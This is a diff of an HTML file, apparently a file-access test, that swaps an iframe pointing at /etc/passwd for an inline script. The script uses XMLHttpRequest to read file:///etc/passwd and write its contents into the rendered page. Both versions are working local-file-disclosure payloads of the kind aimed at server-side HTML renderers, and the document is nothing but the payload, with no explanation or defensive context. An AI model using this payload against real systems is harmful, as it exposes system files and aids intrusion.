--- a/inde.html
+++ b/inde.html
@@ -1,12 +1,15 @@
 <!DOCTYPE html>
-<html>
-<head>
-    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
-    <title>File Access Test</title>
-</head>
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
+
 <body>
-    <div><p>Report Heading</p><iframe src="/etc/passwd" height="500" width="500"></iframe>
-    </div>
-        
-</body>
-</html>
+
+<script>
+x=new XMLHttpRequest;
+x.onload=function(){
+document.write(this.responseText)
+};
+x.open("GET","file:///etc/passwd");
+x.send();
+</script>
+
+</body></html>
